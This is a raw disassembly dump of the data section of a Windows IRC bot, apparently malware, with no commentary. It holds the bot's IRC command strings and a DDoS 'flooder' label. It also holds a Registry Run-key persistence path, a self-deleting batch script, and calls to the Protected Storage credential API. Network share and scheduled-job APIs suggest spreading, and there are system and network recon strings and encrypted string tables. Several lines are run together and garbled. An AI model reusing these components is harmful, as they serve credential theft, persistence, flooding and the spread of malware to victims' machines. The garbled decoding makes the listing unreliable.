aQuitExitting db 'QUIT :exitting',0 ; DATA XREF: sub_40332B+200�o
; sub_40A9CF:loc_40BD52�o
align 4
dword_41864C dd 3430032Dh, 62656402h, 2036775haModuleSReporte db '- Module "%s" reported a crash in "%s": N=%u EAX=%08X EBX=%08X EC'
db 'X=%08X EDX=%08X ESI=%08X EDI=%08X EBP=%08X ESP=%08X EIP=%08X EFLA'
db 'GS=%08X. Code: %08X (%s). %s...',0
align 4
aContinuing db 'Continuing',0 ; DATA XREF: sub_40332B:loc_40342A�o
align 4
aRestarting db 'Restarting',0 ; DATA XREF: sub_40332B+F3�o
align 4
aException_flt db 'EXCEPTION_FLT',0 ; DATA XREF: sub_40332B:loc_40340C�o
align 4
aException_stac db 'EXCEPTION_STACK_OVERFLOW',0 ; DATA XREF: sub_40332B:loc_403403�o
align 10h
aException_nonc db 'EXCEPTION_NONCONTINUABLE_EXCEPTION',0
; DATA XREF: sub_40332B:loc_4033FA�o
align 4
aException_int_ db 'EXCEPTION_INT_DIVIDE_BY_ZERO',0 ; DATA XREF: sub_40332B:loc_4033F1�o
align 4
aException_ille db 'EXCEPTION_ILLEGAL_INSTRUCTION',0 ; DATA XREF: sub_40332B:loc_4033E8�o
align 4
aException_brea db 'EXCEPTION_BREAKPOINT',0 ; DATA XREF: sub_40332B:loc_4033DF�o
align 4
aException_acce db 'EXCEPTION_ACCESS_VIOLATION',0 ; DATA XREF: sub_40332B:loc_4033D6�o
align 4
aException_othe db 'EXCEPTION_OTHER',0 ; DATA XREF: sub_40332B+27�o
aUdp db 'udp',0 ; DATA XREF: sub_4038BA+27C�o
aInternetgetcon db 'InternetGetConnectedStateExA',0 ; DATA XREF: sub_403BD3+20B�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_403BD3:loc_403DCA�o
aPstorecreatein db 'PStoreCreateInstance',0 ; DATA XREF: sub_403BD3+1E4�o
align 10h
aPstorec_dll db 'pstorec.dll',0 ; DATA XREF: sub_403BD3:loc_403DA3�o
aFreeaddrinfo db 'freeaddrinfo',0 ; DATA XREF: sub_403BD3+184�o
align 4
aGetnameinfo db 'getnameinfo',0 ; DATA XREF: sub_403BD3+171�o
aGetaddrinfo db 'getaddrinfo',0 ; DATA XREF: sub_403BD3+15E�o
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_403BD3:loc_403D23�o
align 10h
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_403BD3+13D�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_403BD3+12A�o
align 10h
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_403BD3+117�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_403BD3+104�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_403BD3:loc_403CC3�o
aNetaddalternat db 'NetAddAlternateComputerName',0 ; DATA XREF: sub_403BD3+DD�o
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_403BD3+CA�o
align 10h
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_403BD3+B7�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_403BD3+A4�o
align 4
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_403BD3+91�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_403BD3+7E�o
aNetusedel db 'NetUseDel',0 ; DATA XREF: sub_403BD3+6B�o
align 4
aNetuseadd db 'NetUseAdd',0 ; DATA XREF: sub_403BD3+58�o
align 4
aNetusegetinfo db 'NetUseGetInfo',0 ; DATA XREF: sub_403BD3+45�o
align 4
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_403BD3:loc_403C00�o
align 4
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_403BD3+1A�o
align 10h
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_403BD3+6�o
align 10h
aUseridUnix db ' : USERID : UNIX : ',0 ; DATA XREF: sub_403DF3:loc_403F57�o
dword_4189C4 dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 6920676Eh
; DATA XREF: sub_403DF3+6E�o
dd 746E6564h, 65732064h, 72657672h, 206E6F20h, 74726F70h
dd 34300320h, 3732502h, 2
dword_4189F8 dd 6E656449h, 73206474h, 65767265h, 6E6F2072h, 726F7020h
; DATA XREF: sub_403FE5+7E�o
dd 30032074h, 73250234h, 203h
dword_418A18 dd 333131h dword_418A1C dd 85C58285h, 0FC9588E8h, 0F29BECAEh, 0AAh, 0dword_418A30 dd 2E3031h dword_418A34 dd 2E323931h, 2E383631h, 0dword_418A40 dd 2E323731h, 0 dword_418A48 dd 2E373231h, 0 dword_418A50 dd 252E7525h, 75252E75h, 75252Eh ; sub_41113B+45A�o
dword_418A5C dd 313A3Ah dword_418A60 dd 7525h ; sub_4055E5+69E�o ...
dword_418A64 dd 252E7525h, 75252E75h, 3A75252Eh, 7525h ; sub_4055E5+40B�o ...
aU_U_U_UU db '%u.%u.%u.%u:%u',0Dh,0Ah,0 ; DATA XREF: sub_4055E5+2A3�o
; sub_4055E5+3AF�o ...
align 4
aU db '%u',0Dh,0Ah,0 ; DATA XREF: sub_4055E5+229�o
; sub_4055E5+351�o ...
align 10h
aLgFlooder db 'LG flooder',0 ; DATA XREF: sub_405E45+109�o
align 4
aGetmoduleinfor db 'GetModuleInformation',0 ; DATA XREF: sub_405FA3+5E�o
align 4
aGetmodulefilen db 'GetModuleFileNameExA',0 ; DATA XREF: sub_405FA3+4B�o
align 4
aEnumprocessmod db 'EnumProcessModules',0 ; DATA XREF: sub_405FA3+38�o
align 10h
aEnumprocesses db 'EnumProcesses',0 ; DATA XREF: sub_405FA3:loc_405FC8�o
align 10h
aPsapi_dll db 'psapi.dll',0 ; DATA XREF: sub_405FA3+F�o
align 4
aSystem db 'system',0 ; DATA XREF: sub_406041+136�o
; .packed:0041BBD0�o ...
align 4
dword_418B04 dd 2343003h, 3693425h, 25202E02h, 20583830h, 58383025h
; DATA XREF: sub_40637C+FE�o
dd 732520h
dword_418B1C dd 3430032Dh, 3752502h, 4C202D02h, 69747369h, 320676Eh
; DATA XREF: sub_40637C+51�o
dd 25023430h, 2032569h, 6F727020h, 73736563h, 3A7365h
dword_418B44 dd 7473694Ch, 6F727020h, 73736563h, 7365hdword_418B54 dd 58323025h, 0 ; sub_4147E5+11�o ...
dword_418B5C dd 58383025h, 0 ; sub_40A9CF+1C12�o
dword_418B64 dd 7325h ; sub_406722+296�o ...
aHkus db 'HKUS',0 ; DATA XREF: sub_406722+8D�o
align 10h
aHklm db 'HKLM',0 ; DATA XREF: sub_406722+6B�o
align 4
aHkcu db 'HKCU',0 ; DATA XREF: sub_406722+49�o
align 10h
aHkcr db 'HKCR',0 ; DATA XREF: sub_406722+27�o
align 4
off_418B88 dd offset loc_418DD0 ; DATA XREF: sub_406E8E+4B�r
; sub_406E8E+8D�r ...
off_418B8C dd offset loc_418DA8 ; DATA XREF: sub_406E8E+106�r
; sub_406E8E+12A�r ...
dd offset dword_418D98
dd offset loc_418DA8
dd offset dword_418D88
dd offset dword_418D64
dd offset dword_418D54
dd offset dword_418D34
dd offset dword_418D20
dd offset dword_418D34
dd offset dword_418D0C
dd offset loc_418CF4
dd offset dword_418CE4
dd offset dword_418CD0
dd offset dword_418CBC
dd offset dword_418C9C
dd offset dword_418C88
dd offset dword_418C6C
dd offset dword_418C5C
dd offset dword_418C6C
dd offset dword_418C4C
dd offset loc_418C24
dd offset loc_418C10
dd offset dword_418BF0
align 10h
dword_418BF0 dd 0D9D19CBFh, 0F49599B1h, 0F9BCE2BFh, 0FBDDE4AAh, 0EE928197h
; DATA XREF: .packed:00418BE4�o
dd 0FD969AA6h, 87A7B9h, 0
; ---------------------------------------------------------------------------
loc_418C10: ; DATA XREF: .packed:00418BE0�o
wait
nop
retf 0B2DBh
; ---------------------------------------------------------------------------
db 85h, 88h, 0F7h
dd 0F28DA7E5h, 2 dup(0)
; ---------------------------------------------------------------------------
loc_418C24: ; DATA XREF: .packed:00418BDC�o
mov bl, 85h
retn 0B7C7h
; ---------------------------------------------------------------------------
db 89h, 9Bh, 0E6h
dd 0B79BADA2h, 0F0D6E092h, 0CAF5D580h, 0F38D8FAAh, 0F2A6E2B2h
dd 0F6C6F7ACh, 97h, 0
dword_418C4C dd 0D8D59993h, 0F7828FF0h, 2 dup(0)dword_418C5C dd 0C4DD8581h, 0BC8C9997h, 90BAAEh, 0dword_418C6C dd 0C4DD85A1h, 0B2888FB2h, 0C497B798h, 0F0DBF2A7h, 0DBF3D59Fh
; DATA XREF: .packed:00418BCC�o
; .packed:00418BD4�o
dd 0AEh, 0
dword_418C88 dd 0C4DD8581h, 0F18C99B2h, 0F28DA7E5h, 2 dup(0)
; DATA XREF: .packed:00418BC8�o
dword_418C9C dd 0CFDC9CA5h, 0B2899DB1h, 0E081A785h, 0B5C4F3B1h, 0CEC09CB4h
; DATA XREF: .packed:00418BC4�o
dd 0FE968BA9h, 2 dup(0)
dword_418CBC dd 0CEC09C94h, 0FE968BA9h, 0F28DA7E5h, 2 dup(0)
; DATA XREF: .packed:00418BC0�o
dword_418CD0 dd 0CADC9CA5h, 0D3DA9AB3h, 0E39BA7ACh, 2 dup(0)
; DATA XREF: .packed:00418BBC�o
dword_418CE4 dd 0CADC9C85h, 0F7D49AB3h, 0A7B3h, 0; ---------------------------------------------------------------------------
loc_418CF4: ; DATA XREF: .packed:00418BB4�o
movsd
pushf
fmul st(7), st
mov cl, 9Dh
mov [edx-47A4572h], esi
mov cl, 0F3h
retf 0E7h
; ---------------------------------------------------------------------------
align 4
dd 0
dword_418D0C dd 0C7C28D97h, 0E09F98B1h, 0F28DA7E5h, 2 dup(0)
; DATA XREF: .packed:00418BB0�o
dword_418D20 dd 0E2DC9C85h, 0FC958DB1h, 0F28DA7E5h, 2 dup(0)
; DATA XREF: .packed:00418BA8�o
dword_418D34 dd 0CFDC9CA5h, 0B2899DB1h, 0F892AD87h, 0E5EEA1B0h, 0C8DB9982h
; DATA XREF: .packed:00418BA4�o
; .packed:00418BAC�o
dd 0FD939EBFh, 0A5h, 0
dword_418D54 dd 0C4D59A9Eh, 0EA9FC4B0h, 0AEh, 0dword_418D64 dd 0CEDB99B1h, 0C1DA9EB0h, 0F283B0AEh, 0E0FDA1ACh, 0C6DB819Ch
; DATA XREF: .packed:00418B9C�o
dd 0E0AACABBh, 0E490A1A4h, 0ADh, 0
dword_418D88 dd 0D8C08691h, 0F7828FF0h, 2 dup(0)dword_418D98 dd 0D8D386BBh, 0EA9FC4ADh, 0AEh, 0; ---------------------------------------------------------------------------
loc_418DA8: ; DATA XREF: .packed:off_418B8C�o
; .packed:00418B94�o
mov esi, 0B2CAD19Ah
retf 0F7A9h
; ---------------------------------------------------------------------------
dd 0FE87B7A8h, 0D48FF8AAh, 0C4DA8187h, 0EB8E83ACh, 0E59091EBh
dd 0F0CCE8A8h, 2 dup(0)
; ---------------------------------------------------------------------------
loc_418DD0: ; DATA XREF: .packed:off_418B88�o
sahf
xchg al, cl
retf 0C4ADh
; ---------------------------------------------------------------------------
dw 0EA9Fh
dd 0AEh, 0
dword_418DE0 dd 293Ah dword_418DE4 dd 5Ch ; sub_406AE7+1B�o ...
dword_418DE8 dd 7078655Ch, 65726F6Ch, 78652E72h, 65haSoftwareMicros db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_406C51+1C�o
align 4
a@echoOffDelete db '@echo off',0Dh,0Ah ; DATA XREF: sub_406D90+A8�o
db ':deleteagain',0Dh,0Ah
db 'del /A:H /F %s',0Dh,0Ah
db 'del /F %s',0Dh,0Ah
db 'if exist %s goto deleteagain',0Dh,0Ah
db 'del %s',0Dh,0Ah,0
align 4
a_bat db '.bat',0 ; DATA XREF: sub_406D90+39�o
align 4
aWindowsDllLoad db 'Windows DLL Loader',0 ; DATA XREF: sub_406E8E+20D�o
; sub_407148+19D�o
align 10h
aQuitSUninstall db 'QUIT :%s uninstalled.',0 ; DATA XREF: sub_407148+177�o
; sub_407148+1C9�o
align 4
dword_418EB8 dd 6E6E6F43h, 69746365h, 66206E6Fh, 206D6F72h, 2343003h
; DATA XREF: sub_40732D+115�o
dd 2037325h, 206F7420h, 6B636F73h, 34300373h, 3752502h
dd 65732002h, 72657672h, 7325h
dword_418EEC dd 6A657220h, 65746365h, 64hdword_418EF8 dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 7320676Eh
; DATA XREF: sub_40764D+6A�o
dd 736B636Fh, 72657320h, 20726576h, 70206E6Fh, 2074726Fh
dd 2343003h, 2037325h, 0
dword_418F2C dd 6B636F53h, 65732073h, 72657672h, 206E6F20h, 74726F70h
; DATA XREF: sub_4077DD+9C�o
dd 34300320h, 3732502h, 2
dword_418F4C dd 20h ; sub_407928+96�o ...
dword_418F50 dd 30h ; sub_40CA29+13D�o ...
dword_418F54 dd 252E7325h, 73252E73h, 73252Eh ; sub_40806A+BD�o
dword_418F60 dd 85DC869Fh, 9785BDh, 0dword_418F6C dd 85C58285h, 0E0888FAAh, 0F896ECAAh, 0E7CDAFB3h, 2 dup(0)
; DATA XREF: sub_408887+14�o
dword_418F84 dd 85DC869Fh, 8FBAh, 0dword_418F90 dd 0C6C79496h, 0E69F84F0h, 2 dup(0)dword_418FA0 dd 0CCDD9A95h, 0F3D48FB2h, 0AEh, 0dword_418FB0 dd 0CEDC9C9Ch, 0BC9499B3h, 0B998ADA8h, 0F4BFh, 0off_418FC4 dd offset dword_4190E8 ; DATA XREF: sub_4088FC+19�r
; sub_4088FC+60�r
off_418FC8 dd offset dword_4190B4 ; DATA XREF: sub_4088FC+8A�r
dd offset dword_419098
dd offset dword_419054
dd offset dword_41903C
dd offset dword_418FE4
dd 2 dup(0)
dword_418FE4 dd 0C5C59A96h, 0F69B85B2h, 0FA94A5E5h, 0EC81F2BBh, 0C4DD9D93h
; DATA XREF: .packed:00418FD8�o
dd 0FF9589F0h, 0FA94A5E4h, 0F180F2BBh, 0C7DC829Dh, 0BD9E8BB1h
dd 0F992ABB8h, 0E580E5BBh, 0CAD1859Dh, 0F383C5AEh, 0C89AADA3h
dd 0F0C5E4BCh, 0CEDE9085h, 0E6A5D8BAh, 0A6D8F3A6h, 0F0D7E4F0h
dd 2 dup(0)
dword_41903C dd 0CC9C8687h, 0E19F87BFh, 0FE8CECFAh, 0F681E6B3h, 989Dh
; DATA XREF: .packed:00418FD4�o
dd 0
dword_419054 dd 0C5C59A96h, 0F69B85B2h, 0A6DAF1E4h, 0A680E7F1h, 9A8693C3h
; DATA XREF: .packed:00418FD0�o
dd 0BFCDD8EAh, 0F2C1F2F3h, 0F397B5F3h, 0C88AD8CBh, 0A7D7D2EFh
dd 0AE91F3AAh, 0AD9AE3EDh, 84D7C6C7h, 0E19B99B3h, 0B996ACB2h
dd 0CAF9BBh, 0
dword_419098 dd 0C5C59A96h, 0F69B85B2h, 0F49CAFE5h, 0FADCEEACh, 0C89C8194h
; DATA XREF: .packed:00418FCC�o
dd 87B1h, 0
dword_4190B4 dd 0CAC69496h, 0BD948FF1h, 0B892ABA9h, 0E7DDF4BDh, 84C69B97h
; DATA XREF: .packed:off_418FC8�o
dd 0F5958599h, 0F8A1A7A7h, 0F4CDEDB1h, 0D8DCBC80h, 0FE968BAAh
dd 0F2DBB0AEh, 0E4A6h, 0
dword_4190E8 dd 0C7DD9A86h, 0BC888BBCh, 0F09AADACh, 0F681E4B2h, 989Dh
; DATA XREF: .packed:off_418FC4�o
dd 0
off_419100 dd offset loc_415353+2 ; DATA XREF: sub_408342+2C�o
dword_419104 dd 74737953h, 69206D65h, 726F666Eh, 6974616Dh, 2D206E6Fh
; DATA XREF: sub_4083AD+3CE�o
dd 3A534F20h, 6E695720h, 73776F64h, 34300320h, 3732502h
dd 25282002h, 76202C73h, 2343003h, 252E6425h, 2C020364h
dd 30036220h, 64250234h, 2E290203h, 55504320h, 7325203Ah
dd 34300320h, 3642502h, 7A484D02h, 6152202Eh, 3203A6Dh
dd 25023430h, 4D020364h, 30032F42h, 64250234h, 424D0203h
dd 65726620h, 49202E65h, 3A367650h, 34300320h, 3732502h
dd 55202E02h, 6D697470h, 3203A65h, 25023430h, 64020364h
dd 73257961h, 34300320h, 3642502h, 756F6802h, 20732572h
dd 2343003h, 2036425h, 756E696Dh, 73256574h, 6F43202Eh
dd 7475706Dh, 616E7265h, 203A656Dh, 2343003h, 2037325h
dd 7355202Eh, 203A7265h, 2343003h, 2037325h, 0A0D2Eh
dword_4191F4 dd 73h ; sub_4083AD:loc_4086E7�o ...
aProcessornames db 'ProcessorNameString',0 ; DATA XREF: sub_4083AD+2D2�o
aHardwareDescri db 'HARDWARE\DESCRIPTION\System\CentralProcessor\0',0
; DATA XREF: sub_4083AD+296�o
align 4
aNo db 'No',0 ; DATA XREF: sub_4083AD:loc_4085EB�o
; sub_408B30:loc_408CB4�o ...
align 10h
aYes db 'Yes',0 ; DATA XREF: sub_4083AD+232�o
; sub_408B30+178�o ...
a2003 db '2003',0 ; DATA XREF: sub_4083AD+1FF�o
align 4
aXp db 'XP',0 ; DATA XREF: sub_4083AD+1E1�o
align 10h
a2000 db '2000',0 ; DATA XREF: sub_4083AD+1C3�o
align 4
aMe db 'ME',0 ; DATA XREF: sub_4083AD+1A5�o
align 4
a98 db '98',0 ; DATA XREF: sub_4083AD+187�o
align 10h
aNt db 'NT',0 ; DATA XREF: sub_4083AD+166�o
align 4
a95 db '95',0 ; DATA XREF: sub_4083AD+153�o
align 4
aNoSp db 'no SP',0 ; DATA XREF: sub_4083AD+12E�o
align 10h
a?: ; DATA XREF: sub_4083AD+124�o
unicode 0, <?>,0
aSysinfoThread db 'Sysinfo thread',0 ; DATA XREF: sub_4087C4+2B�o
align 4
dword_419284 dd 7774654Eh, 206B726Fh, 6F666E69h, 74616D72h, 206E6F69h
; DATA XREF: sub_408B30+2D4�o
dd 6F48202Dh, 203A7473h, 2343003h, 2037325h, 614E202Eh
dd 203A656Dh, 2343003h, 2037325h, 7954202Eh, 203A6570h
dd 2343003h, 2037325h, 5049202Eh, 203A3676h, 2343003h
dd 2037325h, 6946202Eh, 61776572h, 64656C6Ch, 3003203Ah
dd 73250234h, 202E0203h, 6574614Ch, 3A79636Eh, 34300320h
dd 3732502h, 25202C02h, 53202E75h, 64656570h, 3003203Ah
dd 30250234h, 366322Eh, 424B2B02h, 6365732Fh, 5249202Eh
dd 70552043h, 656D6974h, 3003203Ah, 64250234h, 61640203h
dd 20732579h, 2343003h, 2036425h, 72756F68h, 3207325h
dd 25023430h, 6D020364h, 74756E69h, 2E732565h, 0
aGood db 'Good',0 ; DATA XREF: sub_408B30+1F9�o
align 4
aAvarage db 'Avarage',0 ; DATA XREF: sub_408B30+1E3�o
aBad db 'Bad',0 ; DATA XREF: sub_408B30+1CD�o
aLan db 'LAN',0 ; DATA XREF: sub_408B30:loc_408C8F�o
aModem db 'Modem',0 ; DATA XREF: sub_408B30+14D�o
align 10h
aUnknown_0 db 'Unknown',0 ; DATA XREF: sub_408B30+F5�o
; sub_408B30+108�o
aNetinfoThread db 'Netinfo thread',0 ; DATA XREF: sub_408E4A+2B�o
align 4
dword_419398 dd 5C3A41h ; sub_408F2E+4E�r ...
dword_41939C dd 6F547325h, 206C6174h, 76697264h, 203A7365h, 2343003h
; DATA XREF: sub_408F2E+270�o
dd 2037525h, 6F54202Ch, 206C6174h, 63617073h, 3203A65h
dd 25023430h, 4D020375h, 72662042h, 2E6565h
dword_4193D4 dd 30037325h, 73250234h, 73250203h, 0dword_4193E4 dd 30037325h, 73250234h, 73250203h, 34300320h, 3752502h
; DATA XREF: sub_408F2E+1C5�o
dd 20424D02h, 65657266h, 0
dword_419404 dd 202Eh ; sub_408F2E+24A�o
aUnknown db 'unknown',0 ; DATA XREF: sub_408F2E:loc_40902D�o
; sub_4129CA+34�o
aRamdisk db 'ramdisk',0 ; DATA XREF: sub_408F2E+F6�o
aCdRom db 'cd-rom',0 ; DATA XREF: sub_408F2E+E4�o
align 10h
aRemote db 'remote',0 ; DATA XREF: sub_408F2E+D2�o
align 4
aFixed db 'fixed',0 ; DATA XREF: sub_408F2E+C0�o
align 10h
aRemovable db 'removable',0 ; DATA XREF: sub_408F2E+AE�o
align 4
aDriveInformati db 'Drive information - ',0 ; DATA XREF: sub_408F2E+2E�o
align 4
aDriveinfoThrea db 'Driveinfo thread',0 ; DATA XREF: sub_4091E2+2B�o
align 4
aThread db 'thread',0 ; DATA XREF: sub_4093B6+98�o
; sub_4094E6+93�o
align 10h
aBtg db 'btg',0 ; DATA XREF: sub_4093B6+93�o
dword_419474 dd 3430032Dh, 62656402h, 2036775haBtgTriedExecut db '- btg tried executing an unreadable address. (%08X)',0
aS db '*%s*',0 ; DATA XREF: sub_4097A7+81�o
; sub_4098F3+C4�o
align 4
dword_4194BC dd 2343003h, 2036925h, 7325202Eh, 0dword_4194CC dd 3430032Dh, 2037802haNoThreadsRunni db '- No threads running.',0
align 4
dword_4194EC dd 3430032Dh, 2037802h, 694C202Dh, 6E697473h, 30032067h
; DATA XREF: sub_409AD5+3A�o
dd 69250234h, 32F0203h, 25023430h, 20020369h, 65726874h
dd 3A736461h, 0
aCouldNotGetAVa db 'Could not get a valid ICMP handle',0Ah,0 ; DATA XREF: sub_409CB1+15�o
align 10h
dword_419540 dd 2343003h, 2036425h, 2020202Eh, 3 dup(2020202Ah), 6F727245h
; DATA XREF: sub_409DD0+3A3�o
dd 30033A72h, 64250234h, 203h
dword_419568 dd 2343003h, 2036425h, 6425202Eh, 2520736Dh, 20736D64h
; DATA XREF: sub_409DD0+37F�o
dd 736D6425h, 34300320h, 2E642502h, 252E6425h, 64252E64h
dd 203h
dword_419594 dd 2343003h, 2036425h, 6425202Eh, 2520736Dh, 20736D64h
; DATA XREF: sub_409DD0+32F�o
dd 736D6425h, 34300320h, 3732502h, 25282002h, 64252E64h
dd 2E64252Eh, 296425h
aCouldNotResolv db 'Could not resolve name',0 ; DATA XREF: sub_409DD0:loc_409F06�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_409DD0+80�o
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_409DD0+6A�o
align 4
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_409DD0:loc_409E24�o
align 4
aIcmp_dll db 'ICMP.DLL',0 ; DATA XREF: sub_409DD0+34�o
align 4
unk_419618 db 55h ; U ; DATA XREF: sub_40A1A7+C�o
db 73h, 61h, 67h
db 65h ; e
db 3Ah, 20h, 3
db 30h ; 0
db 34h, 2, 74h
db 72h ; r
db 61h, 63h, 65h
db 3
db 2, 20h, 3Ch
db 3
db 30h, 34h, 2
db 68h ; h
db 6Fh, 73h, 74h
db 3
db 2, 3Eh, 20h
aHopcountTimeou db '[<hopcount> <timeout> <pingcount>]',0
align 4
dword_41965C dd 202h dword_419660 dd 0A0D7325h, 0 dword_419668 dd 3334h dword_41966C dd 3430032Dh, 3752502h, 51202D02h, 79726575h, 20676E69h
; DATA XREF: sub_40A2D2+24�o
dd 2343003h, 2037325h, 726F6620h, 34300320h, 3732502h
dd 3A02h
dword_419698 dd 6F727245h, 75712072h, 69797265h, 320676Eh, 25023430h
; DATA XREF: sub_40A4A4+44�o
dd 2E020373h, 0
dword_4196B4 dd 72657551h, 676E6979h, 34300320h, 3732502h, 6F662002h
; DATA XREF: sub_40A50E+97�o
dd 30032072h, 73250234h, 203h
dword_4196D4 dd 0C2DD9D85h, 0E09BC4ADh, 0F9DBACA2h, 0F5BBh, 0
; DATA XREF: sub_40A50E:loc_40A562�o
aAbcdef db 'abcdef',0 ; DATA XREF: sub_40A8AD+1B�o
align 10h
aUsername db 'username',0 ; DATA XREF: sub_40A9CF:loc_40C8EA�o
align 4
aId db 'id',0 ; DATA XREF: sub_40A9CF+1EF2�o
align 10h
dword_419700 dd 1A458h align 8
dword_419708 dd 69747055h, 2D20656Dh, 73795320h, 3A6D6574h, 34300320h
; DATA XREF: sub_40A9CF+1EB1�o
dd 3642502h, 79616402h, 3207325h, 25023430h, 68020364h
dd 2572756Fh, 30032073h, 64250234h, 696D0203h, 6574756Eh
dd 202E7325h, 3A435249h, 34300320h, 3642502h, 79616402h
dd 3207325h, 25023430h, 68020364h, 2572756Fh, 30032073h
dd 64250234h, 696D0203h, 6574756Eh, 7325h
dword_41977C dd 49DEF40h dd 2 dup(0)
dword_419788 dd 48C8h align 10h
dword_419790 dd 481DF80h dd 2 dup(0)
a9252 db '9252',0 ; DATA XREF: sub_40A9CF+1BFA�o
align 4
dword_4197A4 dd 0D2B64458h dd 3 dup(0)
dword_4197B4 dd 20ECBD48h align 10h
dword_4197C0 dd 20E58h align 8
dword_4197C8 dd 17E73D48h dd 2 dup(0)
dword_4197D4 dd 17E00h dd 0
dword_4197DC dd 1846E058h dd 2 dup(0)
dword_4197E8 dd 6B6E696Ch, 30037620h, 64250234h, 32E0203h, 25023430h
; DATA XREF: sub_40A9CF+1B17�o
dd 3643330h, 20732502h, 6E69575Bh, 5D3233h
dword_41980C dd 2C39E768h dd 2 dup(0)
dword_419818 dd 2C2E0h align 10h
dword_419820 dd 65657053h, 3203A64h, 25023430h, 4B020375h, 65732F42h
; DATA XREF: sub_40A9CF+1AC8�o
dd 63h
dword_419838 dd 6BB3D8h dd 2 dup(0)
dword_419844 dd 2343003h, 2037325haHasNoIpv4End_ db ' has no ipv4 end.',0
align 10h
dword_419860 dd 20656854h, 34767069h, 646E6520h, 20666F20h, 2343003h
; DATA XREF: sub_40A9CF+1976�o
dd 2037325h, 20736920h, 2343003h, 252E6925h, 69252E69h
dd 369252Eh, 2
a2002 db '2002',0 ; DATA XREF: sub_40A9CF+1851�o
align 4
dword_419898 dd 0AF8C2936h dd 3 dup(0)
dword_4198A8 dd 2343003h, 2037325h, 44202D20h, 203A534Eh, 2343003h
; DATA XREF: sub_40A9CF+17C1�o
dd 2037325h, 0
dword_4198C4 dd 13F4C0h align 10h
dword_4198D0 dd 6F727245h, 65722072h, 766C6F73h, 20676E69h, 2343003h
; DATA XREF: sub_40A9CF+16F1�o
; sub_40A9CF+17EC�o
dd 2037325h, 2Eh
dword_4198EC dd 2343003h, 2037325h, 55202D20h, 6F6E6B6Eh, 74206E77h
; DATA XREF: sub_40A9CF+16AA�o
dd 20657079h, 2343003h, 2036425h, 64646120h, 73736572h
dd 3003203Ah, 73250234h, 203h
dword_419920 dd 2343003h, 2037325h, 49202D20h, 20367650h, 72646461h
; DATA XREF: sub_40A9CF+1659�o
dd 3A737365h, 34300320h, 3732502h, 2
dword_419944 dd 2343003h, 2037325h, 49202D20h, 20347650h, 72646461h
; DATA XREF: sub_40A9CF+1602�o
dd 3A737365h, 34300320h, 3732502h, 2
dword_419968 dd 3Ch ; sub_40A9CF:loc_40C011�o ...
dword_41996C dd 234C0h dd 0
aQuitChangingSe db 'QUIT :changing server',0 ; DATA XREF: sub_40A9CF:loc_40BED3�o
align 4
dword_41998C dd 0E846E061h dd 3 dup(0)
dword_41999C dd 34C82E0h dd 2 dup(0)
dword_4199A8 dd 1DF8h align 10h
dword_4199B0 dd 6488D8h dd 2 dup(0)
dword_4199BC dd 15B98h dd 0
dword_4199C4 dd 0F33EF6E0h dd 3 dup(0)
dword_4199D4 dd 72616843h, 65746361h, 6E692072h, 68202D20h, 203A7865h
; DATA XREF: sub_40A9CF+1431�o
dd 2343003h, 30257830h, 2035832h, 63656420h, 3003203Ah
dd 75250234h, 2E0203h
dword_419A04 dd 0B94A0h align 10h
dword_419A10 dd 27AAFD58h dd 2 dup(0)
dword_419A1C dd 21200h dd 0
dword_419A24 dd 1088D8h align 10h
dword_419A30 dd 130CD8h dd 2 dup(0)
dword_419A3C dd 45444F4Dh, 732520hdword_419A44 dd 71840h align 10h
dword_419A50 dd 0AFA992AEh align 10h
aDebugModeIsS_ db 'Debug mode is %s.',0 ; DATA XREF: sub_40A9CF+129C�o
align 4
aOff db 'off',0 ; DATA XREF: sub_40A9CF:loc_40BC5B�o
aOn db 'on',0 ; DATA XREF: sub_40A9CF+1280�o
; sub_40A9CF:loc_40BC84�o
align 4
dword_419A7C dd 8EDC88h dd 2 dup(0)
dword_419A88 dd 27CC8h align 10h
dword_419A90 dd 41E0380h dd 2 dup(0)
dword_419A9C dd 0CE88h dd 0
dword_419AA4 dd 6A54C8h align 10h
dword_419AB0 dd 54524150h, 732520hdword_419AB8 dd 13DD58h dd 2 dup(0)
dword_419AC4 dd 127DA8h align 10h
dword_419AD0 dd 4E494F4Ah, 20732520h, 7325h ; sub_40A9CF+10FA�o ...
dword_419ADC dd 709A8h dd 2 dup(0)
aQuitSRemoved_ db 'QUIT :%s removed.',0 ; DATA XREF: sub_40A9CF+100A�o
align 4
dword_419AFC dd 4EF2940h dd 2 dup(0)
dword_419B08 dd 5CDC00h dd 2 dup(0)
dword_419B14 dd 996D80h align 10h
dword_419B20 dd 4899A846h align 10h
dword_419B30 dd 279C6798h dd 2 dup(0)
dword_419B3C dd 6CF59849h dd 3 dup(0)
dword_419B4C dd 1D69498h dd 2 dup(0)
dword_419B58 dd 0E4CD8h dd 2 dup(0)
dword_419B64 dd 74736F48h, 72646441h, 3003203Ah, 73250234h, 203h
; DATA XREF: sub_40A9CF+E77�o
dword_419B78 dd 0C777ADA0h dd 3 dup(0)
dword_419B88 dd 65736162h, 64203436h, 646F6365h, 203A6465h, 2343003h
; DATA XREF: sub_40A9CF+E2F�o
dd 2037325h, 0
dword_419BA4 dd 8EE718h align 10h
